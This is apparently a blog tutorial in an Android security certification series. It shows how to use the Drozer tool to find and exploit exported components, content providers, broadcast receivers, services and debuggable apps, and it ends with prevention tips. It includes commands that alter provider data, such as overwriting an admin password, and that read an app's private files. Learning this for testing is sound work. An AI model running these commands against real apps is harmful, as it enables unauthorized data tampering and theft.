Skip to main content

Journey to eMAPT Part 3: Exploiting Static Vulnerabilities in Android Using Drozer

Introduction

Drozer is a powerful Android security assessment tool used to identify and exploit vulnerabilities in Android applications. In this blog, we will focus on exploiting static vulnerabilities in Android apps using Drozer, covering misconfigured exported components, insecure content providers, broadcast receivers, services, and debuggable applications.

Prerequisites

  • A rooted Android device or an emulator (e.g., Genymotion or Android Studio AVD with root access)
  • Drozer installed on both the host machine and Android device/emulator
  • A vulnerable Android app (such as InsecureBank or a custom test app)
`

Step 1: Setting Up Drozer

  1. Install Drozer on your machine: pip install drozer
  2. Install the Drozer agent APK on your Android device/emulator and start it: adb install drozer-agent.apk
  3. Forward the Drozer agent connection: adb forward tcp:31415 tcp:31415
  4. Launch Drozer: drozer console connect

Step 2: Identifying the App’s Attack Surface

The first step in any assessment is to identify the attack surface of the target application.

run app.package.attacksurface package-name

This command lists all exported activities, content providers, services, and broadcast receivers.

Step 3: Exploiting Insecure Content Providers

Content Providers manage app data, but if misconfigured, they can be queried, modified, or deleted by unauthorized apps.

  1. Find vulnerable content providers: run app.provider.finduri package-name
  2. Query the database: run app.provider.query content://com.example.vulnerableapp.provider/users
  3. Modify the database: run app.provider.update content://com.example.vulnerableapp.provider/users --selection "user=admin" --string password "hacked123"

Step 4: Attacking Exported Services

Services run in the background and may perform privileged operations if improperly protected.

  1. List all exported services in the target app: run app.service.info --package package-name
  2. Start a vulnerable service: run app.service.start --action service-name --component package-name service-name

Step 5: Attacking Exported Activities

Some applications have activities that are exported without proper protection, allowing unauthorized access.

  1. List all activities (including non-exported ones): run app.activity.info -a package-name -u
  2. Start an exported activity: run app.activity.start --component package-name activity-name

Step 6: Exploiting Broadcast Receivers

Broadcast receivers listen for system-wide or app-specific broadcasts. If unprotected, they can be intercepted or exploited by malicious apps.

  1. List all exported broadcast receivers: run app.broadcast.info --package package-name
  2. Identify the action associated with the broadcast in AndroidManifest.xml.
  3. Send a malicious broadcast to trigger an insecure receiver: run app.broadcast.send --action action-name --component receiver-name --extra string phone 9090909090 --extra string message "Hello, World!"

Step 7: Exploiting Debuggable Applications

Debuggable applications allow attackers to impersonate the app, inspect its runtime behavior, and gain access to sensitive data.

  1. Find the process ID (PID) of the target app: adb jdwp
  2. Confirm the PID: adb shell ps | grep PID
  3. Access the app’s private directory: adb shell run-as package-name ls -l

Exploitation Tip: If the app has a misconfigured `run-as` policy, an attacker can directly read its private files.

Preventing Static Vulnerabilities

  • Use android:exported="false" for activities, services, and receivers unless explicitly required.
  • Implement permission checks for exported components.
  • Use android:grantUriPermissions cautiously in content providers.
  • Apply secure IPC mechanisms like signature-based permissions for inter-app communication.
  • Never sign production apps with the `debuggable` flag enabled.

Conclusion

Drozer is an essential tool for identifying and exploiting static vulnerabilities in Android applications. By understanding and testing exported activities, insecure content providers, services, broadcast receivers, and debuggable apps, security professionals can strengthen Android app security.

In the next post, we will explore dynamic vulnerabilities and runtime exploitation using Drozer. Stay tuned!

💬 Have questions? Drop them in the comments below!

Labels:

Comments

Post a Comment

Popular posts from this blog

Journey to eMAPT Part 1: Android Basics

Note: Welcome to my journey of mastering Android security! As I prepare for the eMAPT certification, I'll be sharing insights, notes, and tested applications to help fellow learners navigate this exciting field. What is Android? Android is an open-source operating system developed by Google and the Open Handset Alliance. It is designed for mobile devices and offers a customizable platform for developers to create applications. It is based on the Linux kernel and supports features like a user-friendly interface, access to the Google Play Store, and integration with Google services. It is used in smartphones, tablets, smart TVs, smartwatches, and other devices, and has a large developer community contributing to its growth and availability of apps. Since it is used by almost all devices, that means that bug hunters have a huge scope. Android Architecture The Android architecture is composed of several layers that work together to provide a complete operating system for mob...
Post a Comment
Read more

Journey to eMAPT Part 2: Android Application Fundamentals

Activity Lifecycle: onCreate() : Called when the activity is created. onStart() : Called when the activity becomes visible to the user. onResume() : Called when the activity starts interacting with the user. onPause() : Called when the activity is partially visible (but not in focus). onStop() : Called when the activity is no longer visible. onDestroy() : Called before the activity is destroyed. Layouts and Views: Layouts define the structure of the user interface. Views are widgets (buttons, text fields, etc.) that are placed inside layouts. Intents: Intents are messages used to communicate between different components of an application or between different applications. Explicit Intents: Specifies the target component directly. Implicit Intents: Declares an action without a recipient, and the android system resolves the appropriate component to handle it. Data sent by the application could be stolen by a malicious app as it doesn’t specify a recipient. An int...
Post a Comment
Read more